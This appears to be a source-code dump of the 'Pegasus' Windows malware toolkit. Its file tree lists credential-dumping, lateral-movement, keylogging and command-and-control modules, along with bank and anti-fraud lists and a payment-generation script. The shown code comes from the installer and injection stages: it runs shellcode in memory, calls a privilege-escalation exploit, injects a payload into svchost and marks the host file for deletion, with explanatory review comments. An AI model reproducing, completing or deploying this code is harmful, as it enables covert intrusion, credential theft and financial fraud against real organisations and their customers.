├── Pegasus ├── InstallDispatcherDll │ ├── Install_Injection.cpp │ ├── Install_Injection.h │ ├── PrivEsc.cpp │ ├── PrivEsc.h │ ├── idd.c │ ├── idd.h │ ├── idd.vcxproj │ ├── idd.vcxproj.filters │ └── privesc_2015__0057_1701.h ├── InstallerExe │ ├── inst.c │ ├── inst.h │ ├── inst.vcproj │ ├── inst.vcxproj │ ├── inst.vcxproj.filters │ ├── inst.vcxproj.user │ └── resource.h ├── LZ4_pack │ ├── LZ4_pack.vcproj │ ├── LZ4_pack.vcxproj │ ├── LZ4_pack.vcxproj.filters │ ├── LZ4_pack.vcxproj.user │ ├── lib │ │ ├── amd64 │ │ │ ├── BufferOverflowU.lib │ │ │ └── ntdll.lib │ │ └── i386 │ │ │ ├── BufferOverflowU.lib │ │ │ └── ntdll.lib │ ├── main.c │ └── main.h ├── Pegasus.opensdf ├── Pegasus.sdf ├── Pegasus.sln ├── Pegasus.v12.suo ├── README.TXT ├── RemoteServiceExe │ ├── rse.c │ ├── rse.h │ ├── rse.vcxproj │ ├── rse.vcxproj.filters │ └── rse.vcxproj.user ├── Shellcode │ ├── Shellcode.vcproj │ ├── Shellcode.vcxproj │ ├── Shellcode.vcxproj.filters │ ├── Shellcode.vcxproj.user │ ├── dbgt.h │ ├── dbgt.h__ │ ├── shellcode.c │ └── shellcode.h ├── WEB │ ├── .htaccess │ ├── Properties │ │ └── PublishProfiles │ │ │ ├── denwer.phppub │ │ │ └── denwer.phppub.user │ ├── cfg │ │ ├── .htaccess │ │ └── config.php │ ├── inc │ │ ├── .htaccess │ │ ├── mod_crypt.php │ │ ├── mod_db.php │ │ ├── mod_log.php │ │ ├── mod_output.php │ │ ├── mod_parser.php │ │ ├── parser_0001.php │ │ ├── parser_0002.php │ │ ├── parser_0003.php │ │ ├── parser_0004.php │ │ ├── parser_0005.php │ │ ├── parser_0006.php │ │ └── parser_0007.php │ ├── index.php │ ├── pegasus-web.phpproj │ └── pegasus-web.phpproj.user ├── WorkDispatcherDll │ ├── wdd.c │ ├── wdd.h │ ├── wdd.vcxproj │ ├── wdd.vcxproj.filters │ └── wdd.vcxproj.user ├── binres │ ├── idd.x32 │ ├── idd.x64 │ ├── info.json │ │ ├── idd │ │ ├── mod_CmdExec │ │ ├── mod_DomainReplication │ │ ├── mod_KBRI │ │ ├── mod_KBRI_hd │ │ ├── mod_LogonPasswords │ │ ├── mod_NetworkConnectivity │ │ ├── rse │ │ ├── shellcode │ │ └── wdd │ ├── mod_CmdExec.x32 │ ├── mod_CmdExec.x64 │ ├── 
mod_DomainReplication.x32 │ ├── mod_DomainReplication.x64 │ ├── mod_LogonPasswords.x32 │ ├── mod_LogonPasswords.x64 │ ├── mod_NetworkConnectivity.x32 │ ├── mod_NetworkConnectivity.x64 │ ├── readme.txt │ ├── rse.x32 │ ├── rse.x32.nosign.sav │ ├── rse.x32.sign.sav │ ├── rse.x64 │ ├── rse.x64.nosign.sav │ ├── rse.x64.sign.sav │ ├── shellcode.x32 │ ├── shellcode.x64.tlog │ ├── wdd.x32 │ └── wdd.x64 ├── inc │ ├── CredManager.cpp │ ├── CredManager.h │ ├── CryptRoutines.cpp │ ├── CryptRoutines.h │ ├── CryptoStrings.c │ ├── CryptoStrings.h │ ├── DataCallbackManager.cpp │ ├── DataCallbackManager.h │ ├── DomainListMachines.cpp │ ├── DomainListMachines.h │ ├── DynImports.c │ ├── DynImports.h │ ├── EmbeddedResources.cpp │ ├── EmbeddedResources.h │ ├── HashDeriveFuncs.cpp │ ├── HashDeriveFuncs.h │ ├── HashedStrings.c │ ├── HashedStrings.h │ ├── LZ4 │ │ ├── bench.c │ │ ├── bench.h │ │ ├── lz4.c │ │ ├── lz4.h │ │ ├── lz4_format_description.txt │ │ └── lz4demo.c │ ├── LocalStorage.cpp │ ├── LocalStorage.h │ ├── MailslotWorks.cpp │ ├── MailslotWorks.h │ ├── MyStreams.c │ ├── MyStreams.h │ ├── MyStringRoutines.c │ ├── MyStringRoutines.h │ ├── NetMessageEnvelope.cpp │ ├── NetMessageEnvelope.h │ ├── PELoader.cpp │ ├── PELoader.h │ ├── PipeWorks.cpp │ ├── PipeWorks.h │ ├── ProcessInjectMP.cpp │ ├── ProcessInjectMP.h │ ├── RandomGen.c │ ├── RandomGen.h │ ├── RegFuncs.cpp │ ├── RegFuncs.h │ ├── SecureClean.cpp │ ├── SecureClean.h │ ├── WOW64Detect.cpp │ ├── WOW64Detect.h │ ├── WorkDispatcher.cpp │ ├── WorkDispatcher.h │ ├── Wow64Jump.cpp │ ├── Wow64Jump.h │ ├── binpack.h │ ├── dbg.c │ ├── dbg.h │ ├── machineid.cpp │ ├── machineid.h │ ├── mem.c │ └── mem.h ├── lib │ ├── amd64 │ │ ├── BufferOverflowU.lib │ │ └── ntdll.lib │ └── i386 │ │ ├── BufferOverflowU.lib │ │ └── ntdll.lib ├── mod_CmdExec │ ├── ceDiskExec.cpp │ ├── ceDiskExec.h │ ├── ceDllMemory.cpp │ ├── ceDllMemory.h │ ├── ceGeneric.cpp │ ├── ceGeneric.h │ ├── ceShellScript.cpp │ ├── ceShellScript.h │ ├── mod_CmdExec.c │ ├── 
mod_CmdExec.filters │ ├── mod_CmdExec.h │ ├── mod_CmdExec.vcxproj │ └── mod_CmdExec.vcxproj.filters ├── mod_DomainReplication │ ├── DomainReplication.cpp │ ├── DomainReplication.h │ ├── RDP.cpp │ ├── RDP.h │ ├── SCM.cpp │ ├── SCM.h │ ├── WMI.c │ ├── WMI.h │ ├── mod_DomainReplication.c │ ├── mod_DomainReplication.filters │ ├── mod_DomainReplication.h │ ├── mod_DomainReplication.vcxproj │ └── mod_DomainReplication.vcxproj.filters ├── mod_KBRI │ ├── KBRI.cpp │ ├── KBRI.h │ ├── kbriController.cpp │ ├── kbriController.h │ ├── kbriDataParser.cpp │ ├── kbriDataParser.h │ ├── kbriGeneratePurpose.cpp │ ├── kbriGeneratePurpose.h │ ├── kbriInject.cpp │ ├── kbriInject.h │ ├── kbriList.cpp │ ├── kbriList.h │ ├── kbriTargetAccManager.cpp │ ├── kbriTargetAccManager.h │ ├── mod_KBRI.c │ ├── mod_KBRI.filters │ ├── mod_KBRI.h │ ├── mod_KBRI.vcxproj │ └── mod_KBRI.vcxproj.filters ├── mod_KBRI_hd │ ├── APIHook.c │ ├── APIHook.h │ ├── KBRI_hd.cpp │ ├── KBRI_hd.h │ ├── khdProcessing.cpp │ ├── khdProcessing.h │ ├── ldasm.cpp │ ├── ldasm.h │ ├── mod_KBRI_hd.c │ ├── mod_KBRI_hd.filters │ ├── mod_KBRI_hd.h │ ├── mod_KBRI_hd.vcxproj │ └── mod_KBRI_hd.vcxproj.filters ├── mod_LogonPasswords │ ├── LogonPasswords.cpp │ ├── LogonPasswords.h │ ├── globdefs.h │ ├── lpmemory.cpp │ ├── lpmemory.h │ ├── lpprocess.cpp │ ├── lpprocess.h │ ├── mod_LogonPasswords.c │ ├── mod_LogonPasswords.filters │ ├── mod_LogonPasswords.h │ ├── mod_LogonPasswords.vcxproj │ ├── mod_LogonPasswords.vcxproj.filters │ ├── mod_ntddk.h │ ├── sec_pkg │ │ ├── kerberos.cpp │ │ ├── kerberos.h │ │ ├── livessp.cpp │ │ ├── livessp.h │ │ ├── msv1_0.cpp │ │ ├── msv1_0.h │ │ ├── ssp.cpp │ │ ├── ssp.h │ │ ├── tspkg.cpp │ │ ├── tspkg.h │ │ ├── wdigest.cpp │ │ └── wdigest.h │ └── secpkg.h ├── mod_NetworkConnectivity │ ├── NetworkConnectivity.cpp │ ├── NetworkConnectivity.h │ ├── mod_NetworkConnectivity.c │ ├── mod_NetworkConnectivity.filters │ ├── mod_NetworkConnectivity.h │ ├── mod_NetworkConnectivity.vcxproj │ ├── 
mod_NetworkConnectivity.vcxproj.filters │ ├── transport_Generic.cpp │ ├── transport_Generic.h │ ├── transport_Pipes.cpp │ ├── transport_Pipes.h │ ├── transport_WinHTTP.cpp │ └── transport_WinHTTP.h ├── shared │ ├── CommStructures.cpp │ ├── CommStructures.h │ ├── ModuleAPI.h │ ├── ModuleDescriptor.h │ └── config.h ├── tools │ ├── LZ4_pack.exe │ ├── MAKE_INSTALLERS.BAT │ ├── __file2bin.php │ ├── __shellcode2bin.php │ ├── core_build.log │ ├── fake_timestamps.php │ ├── make_binpack.php │ ├── mods_build.log │ ├── postbuild_installer.bat │ ├── prebuild_installer.bat │ ├── rebuild_core.bat │ ├── rebuild_modules.bat │ ├── rebuild_project.bat │ ├── recrypt_strings.bat │ ├── recrypt_strings.php │ └── signtool.exe └── web-adminpart │ ├── .htaccess │ ├── cfg │ ├── .htaccess │ └── config.php │ ├── db.sql │ ├── inc │ ├── .htaccess │ ├── inc_ajax.php │ ├── ip2location.class.php │ ├── mod_ajax_mcreds.php │ ├── mod_ajax_misc.php │ ├── mod_ajax_mjobs.php │ ├── mod_ajax_mmachines.php │ ├── mod_ajax_msqlog.php │ ├── mod_ajax_mtaccs.php │ ├── mod_auth.php │ ├── mod_db.php │ ├── mod_petools.php │ └── mod_router.php │ ├── index.php │ └── res │ ├── .htaccess │ ├── bootstrap.min.css │ ├── bootstrap.min.js │ ├── glyphicons-halflings-regular.eot │ ├── glyphicons-halflings-regular.svg │ ├── glyphicons-halflings-regular.ttf │ ├── index.html │ ├── jquery-1.11.2.min.js │ ├── jquery-ui.min.css │ ├── jquery-ui.min.js │ ├── jquery.form.min.js │ ├── jquery.jeditable.js │ ├── main.js │ ├── messi.min.css │ ├── messi.min.js │ ├── my.css │ ├── pnotify.custom.min.css │ ├── pnotify.custom.min.js │ ├── ui-bg_diagonals-thick_18_b81900_40x40.png │ ├── ui-bg_diagonals-thick_20_666666_40x40.png │ ├── ui-bg_flat_10_000000_40x100.png │ ├── ui-bg_glass_100_f6f6f6_1x400.png │ ├── ui-bg_glass_100_fdf5ce_1x400.png │ ├── ui-bg_glass_65_ffffff_1x400.png │ ├── ui-bg_gloss-wave_35_f6a828_500x100.png │ ├── ui-bg_highlight-soft_100_eeeeee_1x100.png │ ├── ui-bg_highlight-soft_75_ffe45c_1x100.png │ ├── 
ui-icons_222222_256x240.png │ ├── ui-icons_228ef1_256x240.png │ ├── ui-icons_ef8c08_256x240.png │ ├── ui-icons_ffd27a_256x240.png │ └── ui-icons_ffffff_256x240.png ├── bck_check └── check.php ├── cvs_banks ├── asv.csv ├── base.txt ├── fraud_basics.txt ├── one.txt ├── plb.csv ├── АНТИФРАУД.txt ├── Антидропы (485) 24 08 2015.xls ├── Антидропы (500) 30 06 2015.xls ├── Нипбанк.csv ├── СБ Липецк на 17.11.2015.doc ├── Список СБ банков г. Воронежа на 13.02.2013 (со списком рассылки).doc ├── акбарс.csv ├── акрополь.csv ├── генбанк.csv ├── икбанк.csv ├── интерпромбанк.csv ├── металинвестбанк.csv ├── минбанк.csv ├── невский.csv └── рсхб.csv ├── gen_payments_script └── gen1.php ├── info.txt └── readme.txt /Pegasus/InstallDispatcherDll/Install_Injection.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Install_Injection.cpp 3 | Injection method installation 4 | NB: this module uses passed SHELLCODE_CONTEXT structure to prepare new binbuffer (or copy it) 5 | to another injecting process. 
Due to relative ptrs in context, it could be copied directly
6 | The only change should be done here is modification of execution target from IDD (install dll) to WDD (work dll)
7 | Alternatively, IDD may be wiped entirely
8 | */
9 |
10 | #include
11 |
12 | #include "..\inc\mem.h"
13 | #include "..\inc\dbg.h"
14 | #include "..\inc\ProcessInjectMP.h"
15 | #include "..\Shellcode\shellcode.h"
16 | #include "..\shared\ModuleDescriptor.h"
17 |
18 | #include "Install_Injection.h"
19 |
20 |
21 |
22 | /*
23 | Attempts to perform injection of data passed by shellcode's context
24 | into another process, like svchost.exe
25 | pSContext points to start of buffer
26 |
   What the function does, in the order of the body below:
     1. allocates dwFullChunkLen bytes with my_alloc() and memcpy()s the whole chunk
        that starts at pSContext (context structure followed by the rest of the chunk);
     2. in that COPY only, repoints the exec target (prelExecDll / dwExecDllLen) at the
        WDD image (prelWDD / dwWDDLen) and sets bNoReturnFromShellcode = TRUE;
     3. stores this process's own image path (GetModuleFileNameW(NULL, ...)) in the
        copy's bRemoveFilePath, so the injected stage knows which host file to remove;
     4. hands the copy to AttemptSvchostInjection() and frees it afterwards.
   Returns: the BOOL result of AttemptSvchostInjection(), or FALSE when the copy
   could not be allocated. The original buffer at pSContext is never modified.
   NOTE(review): pSContext is dereferenced without a NULL check and dwFullChunkLen
   is trusted as the chunk size; the caller must supply a valid, complete context.
27 | */
28 | BOOL instInjection(SHELLCODE_CONTEXT *pSContext)
29 | {
30 | BOOL bRes = FALSE; // function result
31 |
32 | INJECT_CONTEXT ic = { 0 }; // params for AttemptSvchostInjection() call
33 | SHELLCODE_CONTEXT *sc_copy = NULL; // ptr to a copy of original shellcode context structure, to modify ptrs to dll exec target
34 |
35 | DbgPrint("entered");
36 |
37 | // prepare a copy of the full chunk that starts at pSContext (the length is taken from the context itself)
38 | ic.lInjectionChunkLen = pSContext->dwFullChunkLen;
39 | ic.pInjectionChunk = my_alloc(pSContext->dwFullChunkLen);
40 |
41 | if (!ic.pInjectionChunk) { DbgPrint("ERR: failed to alloc %u bytes to copy starter binpack", pSContext->dwFullChunkLen); return bRes; }
42 |
43 | // copy chunk
44 | memcpy(ic.pInjectionChunk, pSContext, ic.lInjectionChunkLen);
45 |
46 | // fill params for injection
47 | // NB: ic assumes offsets from the START of the chunk, not the shellcode itself, so modify ptrs correctly
   // (dwShellcodeEntrypointOffset is relative to the shellcode, which sits dwStructureLen bytes after the chunk start)
48 | ic.lShellcodeEntryOffset = pSContext->dwShellcodeEntrypointOffset + pSContext->dwStructureLen;
49 |
50 | // get ptr to a shellcode context structure in a new buffer
51 | sc_copy = (SHELLCODE_CONTEXT *)(ic.pInjectionChunk);
52 |
53 | // change execution target in new shellcode context to point to WDD instead of IDD originally
   // (only the copy is patched; the context we were called with keeps its original target)
54 | sc_copy->prelExecDll = sc_copy->prelWDD;
55 | sc_copy->dwExecDllLen = sc_copy->dwWDDLen;
56 |
57 | // also set no-return flag in new copy of structure
58 | sc_copy->bNoReturnFromShellcode = TRUE;
59 |
60 | // query host exe to be removed by WDD at injected process
   // NOTE(review): the return value of GetModuleFileNameW() is ignored (a too-small buffer truncates silently),
   // and MAX_PATH is passed as a count of WCHARs while the destination is cast from bRemoveFilePath[] —
   // confirm in shellcode.h that the field holds at least MAX_PATH * sizeof(WCHAR) bytes, otherwise this write overruns it.
61 | GetModuleFileNameW(NULL, (LPWSTR)&sc_copy->bRemoveFilePath[0], MAX_PATH);
62 |
63 | // call it
64 | bRes = AttemptSvchostInjection(&ic);
65 | DbgPrint("injection api returned %u", bRes);
66 |
67 | // do cleanup — the local copy is freed unconditionally, whether or not injection succeeded
68 | my_free(ic.pInjectionChunk);
69 |
70 | return bRes;
71 | }
-------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/Install_Injection.h: --------------------------------------------------------------------------------
1 | /*
2 | Install_Injection.h
3 | */
4 |
5 | #include
6 |
7 | #include "..\Shellcode\shellcode.h"
8 |
9 | BOOL instInjection(SHELLCODE_CONTEXT *pSContext);
-------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/PrivEsc.h: --------------------------------------------------------------------------------
1 | /*
2 | PrivEsc.h
3 | */
4 |
5 | #include
6 |
7 | typedef BOOL(NTAPI *SHELL_ENTRY_PROC)(ULONG ulTargetPID);
8 |
9 | // structure to pass params and received result from runner thread
10 | typedef struct _PE_THREAD_PARAMS
11 | {
12 | SHELL_ENTRY_PROC sepExploitExec; // ptr to exploit entry function
13 |
14 | BOOL bExecResult; // exec result, returned by exploit
15 |
16 | } PE_THREAD_PARAMS, *PPE_THREAD_PARAMS;
17 |
18 |
19 | VOID privescDo();
-------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/idd.c: --------------------------------------------------------------------------------
1 | /*
2 | idd.c
3 | Install Dispatcher DLL
4 | Executed via shellcode inside of on-disk file, placed by remote machine when domain replication process is in progress
5 | Selects install method to place all the extra data specified by SHELLCODE_CONTEXT structure
6 |
7 | */
8 |
9 |
10 | // perform
essential compiler settings
11 | // remove stdlib
12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib")
13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib")
14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib")
15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib")
16 |
17 |
18 | #include
19 |
20 |
21 |
22 | #include "..\inc\mem.h"
23 | #include "..\inc\dbg.h"
24 | //#include "..\inc\CryptoStrings.h"
25 |
26 |
27 | #include "..\shared\config.h"
28 |
29 | #ifdef DO_PRIVILEGE_ESCALATION
30 | #include "PrivEsc.h"
31 | #endif
32 |
33 | #include "Install_Injection.h"
34 |
35 |
36 | #if defined(_M_X64)
37 | // x64 system libs
38 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib")
39 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib")
40 | #elif defined(_M_IX86)
41 | // x32 system libs
42 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib")
43 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib")
44 | #else
45 | #error Unknown target CPU, no system libs can be found
46 | #endif
47 |
48 |
49 |
50 | #include "idd.h"
51 |
52 |
53 |
54 | // DLL entry point of the Install Dispatcher DLL (the "service exe" wording of the
// original comment does not apply here). lpvReserved is reused to carry the
// SHELLCODE_CONTEXT (cast below) — so this entry only works when invoked by the
// project's own loader that passes it; for a plain LoadLibrary() lpvReserved is
// NULL on DLL_PROCESS_ATTACH and the cast yields a NULL context (not checked here).
// On DLL_PROCESS_ATTACH: optionally privescDo() (DO_PRIVILEGE_ESCALATION, presumably
// set in shared/config.h), then instInjection(); in every case ExitProcess(0)
// follows, so the function never returns on the attach path — the hosting process
// is terminated and bRes is only returned for the other fdwReason values.
55 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
56 | {
57 | BOOL bRes = TRUE;
58 |
59 | if (fdwReason == DLL_PROCESS_ATTACH) {
60 |
61 | DbgPrint("DLL_PROCESS_ATTACH: entered");
62 |
63 | do { // not a loop: single-pass block so that `break` can skip the failure message below
64 |
65 |
66 |
67 | #ifdef DO_PRIVILEGE_ESCALATION
68 | privescDo(); // declared VOID in PrivEsc.h — its outcome cannot be, and is not, checked before continuing
69 | #endif
70 |
71 | // do init and return right back
72 | if (instInjection((SHELLCODE_CONTEXT *)lpvReserved)) { break; } // success: skip the failure path; ExitProcess(0) follows either way
73 |
74 | // other methods...
75 | // ...
76 |
77 | // if got here -> installation failed
78 | DbgPrint("installation failed");
79 |
80 | } while (FALSE); // not a loop
81 |
82 | DbgPrint("DLL_PROCESS_ATTACH: done");
83 |
   // NOTE(review): terminating the process from inside DllMain is normally discouraged
   // (it runs under the loader lock); it appears intended here because the host process
   // is disposable, but note that the result of instInjection() does not affect the exit code.
84 | ExitProcess(0);
85 |
86 | } // DLL_PROCESS_ATTACH
87 |
88 | return bRes;
89 | }
90 |
91 |
92 |
93 |
94 |
95 |
96 |
-------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/idd.h: --------------------------------------------------------------------------------
1 | /*
2 | idd.h
3 | */
4 |
5 | #pragma once
6 |
7 | #include
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
-------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.c: --------------------------------------------------------------------------------
1 | // main.cpp : Defines the entry point for the application.
2 |
3 |
4 | // perform essential compiler settings
5 | // remove stdlib
6 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib")
7 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib")
8 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib")
9 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib")
10 |
11 |
12 | #include
13 |
14 | // for dbg GetComputerObjectName() test
15 | /*
16 | #define SECURITY_WIN32
17 | #include
18 | #pragma comment (lib, "secur32.lib")
19 | */
20 |
21 | #include "..\inc\mem.h"
22 | #include "..\inc\dbg.h"
23 | #include "..\inc\CryptoStrings.h"
24 | #include "..\inc\EmbeddedResources.h"
25 | #include "..\Shellcode\shellcode.h"
26 |
27 |
28 | #if defined(_M_X64)
29 | // x64 system libs
30 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib")
31 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib")
32 | #define TARGET_ARCH ARCH_TYPE_X64
33 | #elif defined(_M_IX86)
34 | // x32 system libs
35 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib")
36 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib")
37 | #define TARGET_ARCH ARCH_TYPE_X32
38 | #else
39 | #error Unknown
target CPU, no system libs can be found
40 | #endif
41 |
42 | // binary resources to be registered, all items in serialized structure to be passed
43 | // ending items contains { 0 } structure to stop enum just after it
44 | #include "..\inc\binpack.h"
45 |
46 |
47 |
48 | #include "inst.h"
49 |
50 | // dbg to show GUID for compname
51 | // NB: looks like guid is assigned only when machine joins a domain
52 | /*
53 | VOID _objname()
54 | {
55 | LPWSTR wszName; // buffer to hold guid string
56 | ULONG ulSize = 256;
57 |
58 | wszName = (LPWSTR)my_alloc(1024);
59 |
60 | GetComputerObjectName(NameUniqueId, wszName, &ulSize);
61 | DbgPrint("compname guid=[%ws]", wszName);
62 |
63 | my_free(wszName);
64 |
65 | }*/
66 |
67 | /*
68 | LONG CALLBACK VectoredHandler(PEXCEPTION_POINTERS ExceptionInfo)
69 | {
70 | DbgPrint("handler entered");
71 |
72 | ExitThread(255);
73 |
74 | return 0;
75 | }
76 | */
77 |
78 | // entrypoint function for installer exe file
// Sequence: erRegisterModules(&pbinpack) registers the embedded modules described by
// binpack.h; erGetStarterBinpack(TARGET_ARCH, ...) then builds an executable chunk in
// memory and reports its buffer, length, the SHELLCODE_CONTEXT pointer inside it and the
// shellcode entry point. On success the entry point is called IN THIS PROCESS with the
// context pointer (no new process or thread is created here); on failure only a debug
// message is printed. Either way: Sleep(5000), then ExitProcess(0).
// TARGET_ARCH is fixed at compile time from _M_X64 / _M_IX86 (see the #if above).
// NOTE(review): pExecBuffer is never released before ExitProcess(); the two commented-out
// helpers above (_objname, VectoredHandler) are debug leftovers and are not compiled.
79 | void __cdecl main()
80 | {
81 | // buffer to hold exec chunk
82 | LPVOID pExecBuffer = NULL;
83 | DWORD dwExecBufferLen = 0;
84 |
85 | ShellcodeEntryPoint shEntry; // ptr to entrypoint for shellcode at pExecBuffer
86 | LPVOID pContextPtr = NULL; // ptr at pExecBuffer to SHELLCODE_CONTEXT structure
87 |
88 | //HANDLE pHandler = NULL;
89 |
90 | DbgPrint("entered, registering modules");
91 |
92 | // enum and register all embedded modules
93 | erRegisterModules(&pbinpack);
94 |
95 | // generate binpack
96 | DbgPrint("generating binpack for execution");
97 | if (erGetStarterBinpack(TARGET_ARCH, &pExecBuffer, &dwExecBufferLen, &pContextPtr, (LPVOID *)&shEntry)) {
98 |
99 | //if (!(pHandler = AddVectoredExceptionHandler(0, &VectoredHandler))) { DbgPrint("ERR: failed to add vectored handler"); }
100 |
101 | // do exec — synchronous call into the generated buffer; control only comes back if the shellcode returns
102 | DbgPrint("executing from %p passing param %p, pExecBuffer=%p dwExecBufferLen=%u", shEntry, pContextPtr, pExecBuffer, dwExecBufferLen);
103 | shEntry(pContextPtr);
104 | DbgPrint("all done");
105 |
106 |
/* NOTE: the closing brace of the if-block (original line 106) is missing from this listing — an extraction artefact, not part of the source */
else { DbgPrint("ERR: failed to generate exec buffer"); }
107 |
108 | Sleep(5000); // purpose not stated in the source; presumably gives the stage started by the shellcode time to come up — TODO confirm
109 |
110 | // is this needed? (presumably yes: main() is void and the CRT is linked out via /NODEFAULTLIB above, so there is no runtime to return into)
111 | ExitProcess(0);
112 | }
113 |
114 |
115 |
116 |
117 |
118 |
119 |
-------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.h: --------------------------------------------------------------------------------
1 | /*
2 | inst.h
3 | Headers for main file
4 | */
5 |
6 | #pragma once
7 |
8 | #include
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
-------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(OutDir)$(ProjectName)32.exe 5 | WindowsLocalDebugger 6 | 7 | 8 | $(OutDir)$(ProjectName)64.exe 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /Pegasus/InstallerExe/resource.h: --------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by inst.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1000 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/LZ4_pack.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {40e48244-e3b1-455a-9190-5ad5e9b92084} 10 | 11 | 12 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 13 | h;hpp;hxx;hm;inl;inc;xsd 14 | 15 | 16 | {b3e299b9-8f41-45b2-a206-a8b9322b0b63} 17 | 18 | 19 | 20 | 21 | Source Files 22 | 23 | 24 | Source Files\libs 25 | 26 | 27 | Source Files\libs 28 | 29 | 30 | Source Files\libs 31 | 32 | 33 | Source Files\libs 34 | 35 | 36 | Source Files\libs 37 | 38 | 39 | 40 | 41 | Header Files 42 | 43 | 44 | Header Files\libs 45 | 46 | 47 | Header Files\libs 48 | 49 | 50 | Header Files\libs 51 | 52 | 53 | Header Files\libs 54 | 55 | 56 | Header Files\libs 57 | 58 | 59 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/LZ4_pack.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/amd64/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/amd64/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/amd64/ntdll.lib: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/amd64/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/i386/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/i386/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/i386/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/i386/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/main.h: -------------------------------------------------------------------------------- 1 | /* 2 | main.h 3 | StarterExe headers for main file 4 | */ 5 | 6 | #pragma once 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Pegasus/Pegasus.opensdf: -------------------------------------------------------------------------------- 1 | userIBUILD2 -------------------------------------------------------------------------------- /Pegasus/Pegasus.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/Pegasus.sdf -------------------------------------------------------------------------------- /Pegasus/Pegasus.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/Pegasus.v12.suo 
-------------------------------------------------------------------------------- /Pegasus/README.TXT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/README.TXT -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.h: -------------------------------------------------------------------------------- 1 | /* 2 | inst.h 3 | Headers for main file 4 | */ 5 | 6 | #pragma once 7 | 8 | #include 9 | 10 | // prototype of shellcode's entrypoint - it receives ptr where in mem it is placed 11 | typedef void (_stdcall *ShellcodeEntrypoint)(LPVOID); 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {a98e1532-1a9f-454d-bb98-b142237a22d1} 10 | 11 | 12 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 13 | h;hpp;hxx;hm;inl;inc;xsd 14 | 15 | 16 | 